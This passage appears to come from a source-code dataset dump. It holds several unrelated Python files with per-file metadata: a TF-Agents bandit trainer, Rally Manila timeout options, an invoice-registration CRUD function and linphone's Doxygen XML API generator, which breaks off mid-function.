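include_reserved = True  # mirrors the ?reserved=1 query parameter

used_limits = {}
for display_name, key in quota_map.items():
    if key in quotas:
        reserved = quotas[key]["reserved"] if include_reserved else 0
        used_limits[display_name] = quotas[key]["in_use"] + reserved

print(used_limits)  # {'totalRAMUsed': 2560, 'totalCoresUsed': 4}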
| 35.7875
| 78
| 0.625218
| 321
| 2,863
| 5.395639
| 0.423676
| 0.034642
| 0.025404
| 0.046189
| 0.161663
| 0.116628
| 0.079677
| 0.079677
| 0
| 0
| 0
| 0.00441
| 0.287111
| 2,863
| 79
| 79
| 36.240506
| 0.844194
| 0.204331
| 0
| 0.181818
| 0
| 0
| 0.151502
| 0.02871
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.109091
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86612e58c1d3c9004b21a40197263a8e6dc182a5
| 7,362
|
py
|
Python
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
howards11/agents
|
8d5627d9b9c3680468a63564c25a4d82fa1befb0
|
[
"Apache-2.0"
] | 3,175
|
2017-09-08T18:28:32.000Z
|
2022-03-31T01:32:22.000Z
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
MFosset/agents
|
756f7bdf493986c25eb585438134f1dbb8045b1b
|
[
"Apache-2.0"
] | 703
|
2017-09-18T05:51:57.000Z
|
2022-03-31T17:37:50.000Z
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
MFosset/agents
|
756f7bdf493986c25eb585438134f1dbb8045b1b
|
[
"Apache-2.0"
] | 844
|
2017-09-08T23:28:57.000Z
|
2022-03-30T09:29:32.000Z
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Generic TF-Agents training function for bandits."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import logging
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.drivers import dynamic_step_driver
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.policies import policy_saver
from tf_agents.replay_buffers import tf_uniform_replay_buffer
tf = tf.compat.v2
AGENT_CHECKPOINT_NAME = 'agent'
STEP_CHECKPOINT_NAME = 'step'
CHECKPOINT_FILE_PREFIX = 'ckpt'
def get_replay_buffer(data_spec,
batch_size,
steps_per_loop):
"""Return a `TFUniformReplayBuffer` for the given `agent`."""
buf = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=data_spec,
batch_size=batch_size,
max_length=steps_per_loop)
return buf
def set_expected_shape(experience, num_steps):
def set_time_dim(input_tensor, steps):
tensor_shape = input_tensor.shape.as_list()
tensor_shape[1] = steps
input_tensor.set_shape(tensor_shape)
tf.nest.map_structure(lambda t: set_time_dim(t, num_steps), experience)
def get_training_loop_fn(driver, replay_buffer, agent, steps):
"""Returns a `tf.function` that runs the driver and training loops.
Args:
driver: an instance of `Driver`.
replay_buffer: an instance of `ReplayBuffer`.
agent: an instance of `TFAgent`.
steps: an integer indicating how many driver steps should be
executed and presented to the trainer during each training loop.
"""
def training_loop():
"""Returns a `tf.function` that runs the training loop."""
driver.run()
batch_size = driver.env.batch_size
dataset = replay_buffer.as_dataset(
sample_batch_size=batch_size,
num_steps=steps,
single_deterministic_pass=True)
experience, unused_info = tf.data.experimental.get_single_element(dataset)
set_expected_shape(experience, steps)
loss_info = agent.train(experience)
replay_buffer.clear()
return loss_info
return training_loop
def restore_and_get_checkpoint_manager(root_dir, agent, metrics, step_metric):
"""Restores from `root_dir` and returns a function that writes checkpoints."""
trackable_objects = {metric.name: metric for metric in metrics}
trackable_objects[AGENT_CHECKPOINT_NAME] = agent
trackable_objects[STEP_CHECKPOINT_NAME] = step_metric
checkpoint = tf.train.Checkpoint(**trackable_objects)
checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint,
directory=root_dir,
max_to_keep=5)
latest = checkpoint_manager.latest_checkpoint
if latest is not None:
logging.info('Restoring checkpoint from %s.', latest)
checkpoint.restore(latest)
logging.info('Successfully restored to step %s.', step_metric.result())
else:
logging.info('Did not find a pre-existing checkpoint. '
'Starting from scratch.')
return checkpoint_manager
def train(root_dir,
agent,
environment,
training_loops,
steps_per_loop,
additional_metrics=(),
training_data_spec_transformation_fn=None):
"""Perform `training_loops` iterations of training.
Checkpoint results.
If one or more baseline_reward_fns are provided, the regret is computed
against each one of them. Here is example baseline_reward_fn:
def baseline_reward_fn(observation, per_action_reward_fns):
rewards = ... # compute reward for each arm
optimal_action_reward = ... # take the maximum reward
return optimal_action_reward
Args:
root_dir: path to the directory where checkpoints and metrics will be
written.
agent: an instance of `TFAgent`.
environment: an instance of `TFEnvironment`.
training_loops: an integer indicating how many training loops should be run.
steps_per_loop: an integer indicating how many driver steps should be
executed and presented to the trainer during each training loop.
additional_metrics: Tuple of metric objects to log, in addition to default
metrics `NumberOfEpisodes`, `AverageReturnMetric`, and
`AverageEpisodeLengthMetric`.
training_data_spec_transformation_fn: Optional function that transforms the
data items before they get to the replay buffer.
"""
# TODO(b/127641485): create evaluation loop with configurable metrics.
if training_data_spec_transformation_fn is None:
data_spec = agent.policy.trajectory_spec
else:
data_spec = training_data_spec_transformation_fn(
agent.policy.trajectory_spec)
replay_buffer = get_replay_buffer(data_spec, environment.batch_size,
steps_per_loop)
# `step_metric` records the number of individual rounds of bandit interaction;
# that is, (number of trajectories) * batch_size.
step_metric = tf_metrics.EnvironmentSteps()
metrics = [
tf_metrics.NumberOfEpisodes(),
tf_metrics.AverageEpisodeLengthMetric(batch_size=environment.batch_size)
] + list(additional_metrics)
if isinstance(environment.reward_spec(), dict):
metrics += [tf_metrics.AverageReturnMultiMetric(
reward_spec=environment.reward_spec(),
batch_size=environment.batch_size)]
else:
metrics += [
tf_metrics.AverageReturnMetric(batch_size=environment.batch_size)]
if training_data_spec_transformation_fn is not None:
add_batch_fn = lambda data: replay_buffer.add_batch( # pylint: disable=g-long-lambda
training_data_spec_transformation_fn(data))
else:
add_batch_fn = replay_buffer.add_batch
observers = [add_batch_fn, step_metric] + metrics
driver = dynamic_step_driver.DynamicStepDriver(
env=environment,
policy=agent.collect_policy,
num_steps=steps_per_loop * environment.batch_size,
observers=observers)
training_loop = get_training_loop_fn(
driver, replay_buffer, agent, steps_per_loop)
checkpoint_manager = restore_and_get_checkpoint_manager(
root_dir, agent, metrics, step_metric)
train_step_counter = tf.compat.v1.train.get_or_create_global_step()
saver = policy_saver.PolicySaver(agent.policy, train_step=train_step_counter)
summary_writer = tf.summary.create_file_writer(root_dir)
summary_writer.set_as_default()
for i in range(training_loops):
training_loop()
metric_utils.log_metrics(metrics)
for metric in metrics:
metric.tf_summaries(train_step=step_metric.result())
checkpoint_manager.save()
if i % 100 == 0:
saver.save(os.path.join(root_dir, 'policy_%d' % step_metric.result()))
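The control flow that train() assembles (collect with a driver, train on the drained buffer, repeat) can be seen without any TensorFlow machinery. Every name in this sketch is a stand-in for illustration, not a TF-Agents API:

class ToyBuffer:
    def __init__(self):
        self.items = []

    def add(self, item):
        self.items.append(item)

    def clear(self):
        self.items = []

def toy_train(collect_fn, update_fn, steps_per_loop, training_loops):
    buf = ToyBuffer()
    for loop in range(training_loops):
        for _ in range(steps_per_loop):  # the driver's role: gather experience
            buf.add(collect_fn())
        loss = update_fn(buf.items)      # agent.train() on the collected batch
        buf.clear()                      # the uniform buffer is drained each loop
        print("loop", loop, "loss", loss)

toy_train(lambda: 1.0, lambda batch: sum(batch) / len(batch),
          steps_per_loop=4, training_loops=2)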
| 37.948454
| 89
| 0.740424
| 966
| 7,362
| 5.380952
| 0.291925
| 0.027703
| 0.01616
| 0.034629
| 0.175644
| 0.103117
| 0.103117
| 0.078107
| 0.078107
| 0.060793
| 0
| 0.004341
| 0.186362
| 7,362
| 193
| 90
| 38.145078
| 0.863439
| 0.338631
| 0
| 0.035088
| 0
| 0
| 0.030659
| 0
| 0
| 0
| 0
| 0.005181
| 0
| 1
| 0.061404
| false
| 0.008772
| 0.096491
| 0
| 0.192982
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86614dcad65e20388a5967a40083bdb556db6db0
| 2,469
|
py
|
Python
|
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | null | null | null |
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | null | null | null |
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | 1
|
2018-12-10T12:31:27.000Z
|
2018-12-10T12:31:27.000Z
|
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally.common import cfg
OPTS = {"openstack": [
cfg.FloatOpt(
"manila_share_create_prepoll_delay",
default=2.0,
deprecated_group="benchmark",
help="Delay between creating Manila share and polling for its "
"status."),
cfg.FloatOpt(
"manila_share_create_timeout",
default=300.0,
deprecated_group="benchmark",
help="Timeout for Manila share creation."),
cfg.FloatOpt(
"manila_share_create_poll_interval",
default=3.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila share "
"creation."),
cfg.FloatOpt(
"manila_share_delete_timeout",
default=180.0,
deprecated_group="benchmark",
help="Timeout for Manila share deletion."),
cfg.FloatOpt(
"manila_share_delete_poll_interval",
default=2.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila share "
"deletion."),
cfg.FloatOpt(
"manila_access_create_timeout",
default=300.0,
deprecated_group="benchmark",
help="Timeout for Manila access creation."),
cfg.FloatOpt(
"manila_access_create_poll_interval",
default=3.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila access "
"creation."),
cfg.FloatOpt(
"manila_access_delete_timeout",
default=180.0,
deprecated_group="benchmark",
help="Timeout for Manila access deletion."),
cfg.FloatOpt(
"manila_access_delete_poll_interval",
default=2.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila access "
"deletion."),
]}
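These OPTS are consumed through oslo.config, which rally.common.cfg wraps. A hedged sketch of registration and lookup; the exact wiring inside Rally itself may differ:

from oslo_config import cfg as oslo_cfg

CONF = oslo_cfg.ConfigOpts()
CONF.register_opts(OPTS["openstack"], group="openstack")
CONF([])  # parse an empty argv so the defaults above take effect
print(CONF.openstack.manila_share_create_timeout)  # -> 300.0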
| 35.271429
| 78
| 0.651681
| 288
| 2,469
| 5.444444
| 0.354167
| 0.070153
| 0.097577
| 0.143495
| 0.638393
| 0.579719
| 0.579719
| 0.524235
| 0.446429
| 0.432398
| 0
| 0.018569
| 0.258404
| 2,469
| 69
| 79
| 35.782609
| 0.837794
| 0.243013
| 0
| 0.660377
| 0
| 0
| 0.443366
| 0.149407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86624e00bb7b419aff83121a582546742f805433
| 571
|
py
|
Python
|
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
from sqlalchemy.orm.session import Session
from app import crud
from .utils import insert, get_content
def register_invoice(db: Session, url: str):
content = get_content.get_invoice_info(url)
grocery_store_id = insert.insert_grocery_store_info(
db, obj_in=content["grocery_store"]
)
invoice_id = insert.insert_invoice_info(
db, obj_in=content["invoice"], grocery_store_id=grocery_store_id
)
insert.insert_invoice_items(db, content["items"], grocery_store_id, invoice_id)
return crud.get_invoice_by_id(db, id=invoice_id)
| 27.190476
| 83
| 0.749562
| 83
| 571
| 4.807229
| 0.313253
| 0.180451
| 0.140351
| 0.100251
| 0.220551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161121
| 571
| 20
| 84
| 28.55
| 0.832985
| 0
| 0
| 0
| 0
| 0
| 0.043783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.230769
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8666c057450744d94668536ee8580d907346f31a
| 28,602
|
py
|
Python
|
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | null | null | null |
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | null | null | null |
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | 1
|
2021-03-17T10:04:06.000Z
|
2021-03-17T10:04:06.000Z
|
#!/usr/bin/python
# Copyright (C) 2014 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import os
import six
import string
import sys
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
import metadoc
class CObject:
def __init__(self, name):
self.name = name.strip()
self.briefDescription = ''
self.detailedDescription = None
self.deprecated = False
self.briefDoc = None
class CEnumValue(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.value = None
class CEnum(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.values = []
self.associatedTypedef = None
def addValue(self, value):
self.values.append(value)
class CStructMember(CObject):
def __init__(self, name, t):
CObject.__init__(self, name)
self.ctype = t.strip()
class CStruct(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.members = []
self.associatedTypedef = None
def addMember(self, member):
self.members.append(member)
class CTypedef(CObject):
def __init__(self, name, definition):
CObject.__init__(self, name)
self.definition = definition.strip()
class CArgument(CObject):
def __init__(self, t, name = '', enums = [], structs = []):
CObject.__init__(self, name)
self.description = None
self.containedType = None
keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]
fullySplittedType = []
splittedType = t.strip().split(' ')
for s in splittedType:
if s.startswith('*'):
fullySplittedType.append('*')
if len(s) > 1:
fullySplittedType.append(s[1:])
elif s.endswith('*'):
fullySplittedType.append(s[:-1])
fullySplittedType.append('*')
else:
fullySplittedType.append(s)
if 'MS2_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('MS2_DEPRECATED')
elif 'LINPHONE_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('LINPHONE_DEPRECATED')
isStruct = False
isEnum = False
self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short'
for s in fullySplittedType:
if not s in keywords:
self.ctype = s
if s == 'struct':
isStruct = True
if s == 'enum':
isEnum = True
if isStruct:
for st in structs:
if st.associatedTypedef is not None:
self.ctype = st.associatedTypedef.name
elif isEnum:
for e in enums:
if e.associatedTypedef is not None:
self.ctype = e.associatedTypedef.name
if self.ctype == 'int' and 'int' not in fullySplittedType:
if fullySplittedType[-1] == '*':
fullySplittedType.insert(-1, 'int')
else:
fullySplittedType.append('int')
self.completeType = ' '.join(fullySplittedType)
def __str__(self):
return self.completeType + " " + self.name
class CArgumentsList:
def __init__(self):
self.arguments = []
def addArgument(self, arg):
self.arguments.append(arg)
def __len__(self):
return len(self.arguments)
def __getitem__(self, key):
return self.arguments[key]
def __str__(self):
argstr = []
for arg in self.arguments:
argstr.append(str(arg))
return ', '.join(argstr)
class CFunction(CObject):
def __init__(self, name, returnarg, argslist):
CObject.__init__(self, name)
self.returnArgument = returnarg
self.arguments = argslist
self.location = None
class CEvent(CFunction):
pass
class CProperty:
def __init__(self, name):
self.name = name
self.getter = None
self.setter = None
class CClass(CObject):
def __init__(self, st):
CObject.__init__(self, st.associatedTypedef.name)
if st.deprecated or st.associatedTypedef.deprecated:
self.deprecated = True
if len(st.associatedTypedef.briefDescription) > 0:
self.briefDescription = st.associatedTypedef.briefDescription
elif len(st.briefDescription) > 0:
self.briefDescription = st.briefDescription
if st.associatedTypedef.detailedDescription is not None:
self.detailedDescription = st.associatedTypedef.detailedDescription
elif st.detailedDescription is not None:
self.detailedDescription = st.detailedDescription
self.__struct = st
self.events = {}
self.classMethods = {}
self.instanceMethods = {}
self.properties = {}
self.__computeCFunctionPrefix()
def __computeCFunctionPrefix(self):
self.cFunctionPrefix = ''
first = True
for l in self.name:
if l.isupper() and not first:
self.cFunctionPrefix += '_'
self.cFunctionPrefix += l.lower()
first = False
self.cFunctionPrefix += '_'
def __addPropertyGetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].getter = f
def __addPropertySetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].setter = f
def __addClassMethod(self, f):
if not f.name in self.classMethods:
self.classMethods[f.name] = f
def __addInstanceMethod(self, f):
name = f.name[len(self.cFunctionPrefix):]
if name.startswith('get_') and len(f.arguments) == 1:
self.__addPropertyGetter(name[4:], f)
elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.startswith('set_') and len(f.arguments) == 2:
self.__addPropertySetter(name[4:], f)
elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':
self.__addPropertySetter(name[7:] + '_enabled', f)
else:
if not f.name in self.instanceMethods:
self.instanceMethods[f.name] = f
def addEvent(self, ev):
if not ev.name in self.events:
self.events[ev.name] = ev
def addMethod(self, f):
if len(f.arguments) > 0 and f.arguments[0].ctype == self.name:
self.__addInstanceMethod(f)
else:
self.__addClassMethod(f)
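__computeCFunctionPrefix above turns a CamelCase class name into the snake_case prefix used to match C functions to their class. The same transform as a standalone function:

def c_function_prefix(class_name):
    prefix = ''
    for i, ch in enumerate(class_name):
        if ch.isupper() and i > 0:
            prefix += '_'
        prefix += ch.lower()
    return prefix + '_'

print(c_function_prefix('LinphoneCoreManager'))  # -> linphone_core_manager_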
class Project:
def __init__(self):
self.verbose = False
self.prettyPrint = False
self.enums = []
self.__structs = []
self.__typedefs = []
self.__events = []
self.__functions = []
self.classes = []
self.docparser = metadoc.Parser()
def add(self, elem):
if isinstance(elem, CClass):
if self.verbose:
print("Adding class " + elem.name)
self.classes.append(elem)
elif isinstance(elem, CEnum):
if self.verbose:
print("Adding enum " + elem.name)
for ev in elem.values:
print("\t" + ev.name)
self.enums.append(elem)
elif isinstance(elem, CStruct):
if self.verbose:
print("Adding struct " + elem.name)
for sm in elem.members:
print("\t" + sm.ctype + " " + sm.name)
self.__structs.append(elem)
elif isinstance(elem, CTypedef):
if self.verbose:
print("Adding typedef " + elem.name)
print("\t" + elem.definition)
self.__typedefs.append(elem)
elif isinstance(elem, CEvent):
if self.verbose:
print("Adding event " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__events.append(elem)
elif isinstance(elem, CFunction):
if self.verbose:
print("Adding function " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__functions.append(elem)
def __cleanDescription(self, descriptionNode):
for para in descriptionNode.findall('./para'):
for n in para.findall('./parameterlist'):
para.remove(n)
for n in para.findall("./simplesect[@kind='return']"):
para.remove(n)
for n in para.findall("./simplesect[@kind='see']"):
t = ''.join(n.itertext())
n.clear()
n.tag = 'see'
n.text = t
for n in para.findall("./simplesect[@kind='note']"):
n.tag = 'note'
n.attrib = {}
for n in para.findall(".//xrefsect"):
para.remove(n)
for n in para.findall('.//ref'):
n.attrib = {}
for n in para.findall(".//bctbx_list"):
para.remove(n)
if descriptionNode.tag == 'parameterdescription':
descriptionNode.tag = 'description'
if descriptionNode.tag == 'simplesect':
descriptionNode.tag = 'description'
descriptionNode.attrib = {}
return descriptionNode
def __canBeWrapped(self, node):
return node.find('./detaileddescription//donotwrap') is None
def __discoverClasses(self):
for td in self.__typedefs:
if td.definition.startswith('enum '):
for e in self.enums:
if (e.associatedTypedef is None) and td.definition[5:] == e.name:
e.associatedTypedef = td
break
elif td.definition.startswith('struct '):
structFound = False
for st in self.__structs:
if (st.associatedTypedef is None) and td.definition[7:] == st.name:
st.associatedTypedef = td
structFound = True
break
if not structFound:
name = td.definition[7:]
print("Structure with no associated typedef: " + name)
st = CStruct(name)
st.associatedTypedef = td
self.add(st)
for td in self.__typedefs:
if td.definition.startswith('struct '):
for st in self.__structs:
if st.associatedTypedef == td:
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(cclass)
break
elif ('Linphone' + td.definition) == td.name:
st = CStruct(td.name)
st.associatedTypedef = td
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(st)
self.add(cclass)
# Sort classes by length of name (longest first), so that methods are put in the right class
self.classes.sort(key = lambda c: len(c.name), reverse = True)
for e in self.__events:
eventAdded = False
for c in self.classes:
if c.name.endswith('Cbs') and e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
if not eventAdded:
for c in self.classes:
if e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
for f in self.__functions:
for c in self.classes:
if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:
c.addMethod(f)
break
def __parseCEnumValueInitializer(self, initializer):
initializer = initializer.strip()
if not initializer.startswith('='):
return None
initializer = initializer[1:].strip()  # strip() returns a new string; the result must be kept
return initializer
def __parseCEnumValue(self, node):
ev = CEnumValue(node.find('./name').text)
initializerNode = node.find('./initializer')
if initializerNode is not None:
ev.value = self.__parseCEnumValueInitializer(initializerNode.text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
ev.deprecated = True
ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return ev
def __parseCEnumMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
e = CEnum(node.find('./name').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
e.deprecated = True
e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
e.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
enumvalues = node.findall("enumvalue[@prot='public']")
for enumvalue in enumvalues:
ev = self.__parseCEnumValue(enumvalue)
e.addValue(ev)
return e
def __findCEnum(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']")
for m in memberdefs:
e = self.__parseCEnumMemberdef(m)
self.add(e)
def __parseCStructMember(self, node, structname):
name = node.find('./name').text
definition = node.find('./definition').text
t = definition[0:definition.find(structname + "::" + name)]
sm = CStructMember(name, t)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
sm.deprecated = True
sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return sm
def __parseCStructCompounddef(self, node):
s = CStruct(node.find('./compoundname').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
s.deprecated = True
s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
s.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']")
for structmember in structmembers:
sm = self.__parseCStructMember(structmember, s.name)
s.addMember(sm)
return s
def __findCStruct(self, tree):
compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']")
for c in compounddefs:
s = self.__parseCStructCompounddef(c)
self.add(s)
def __parseCTypedefMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
name = node.find('./name').text
definition = node.find('./definition').text
if definition.startswith('typedef '):
definition = definition[8 :]
if name.endswith('Cb'):
pos = definition.find("(*")
if pos == -1:
return None
returntype = definition[0:pos].strip()
missingDocWarning = ''  # must be initialized before the += below
returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
definition = definition[pos + 2 :]
pos = definition.find("(")
definition = definition[pos + 1 : -1]
argslist = CArgumentsList()
for argdef in definition.split(', '):
argType = ''
starPos = argdef.rfind('*')
spacePos = argdef.rfind(' ')
if starPos != -1:
argType = argdef[0 : starPos + 1]
argName = argdef[starPos + 1 :]
elif spacePos != -1:
argType = argdef[0 : spacePos]
argName = argdef[spacePos + 1 :]
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
for arg in argslist.arguments:
if arg.description is None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
f = CEvent(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return f
else:
pos = definition.rfind(" " + name)
if pos != -1:
definition = definition[0 : pos]
td = CTypedef(name, definition)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
td.deprecated = True
td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
td.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return td
return None
def __findCTypedef(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']")
for m in memberdefs:
td = self.__parseCTypedefMemberdef(m)
self.add(td)
def __parseCFunctionMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
internal = node.find("./detaileddescription/internal")
if internal is not None:
return None
missingDocWarning = ''
name = node.find('./name').text
t = ''.join(node.find('./type').itertext())
returnarg = CArgument(t, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
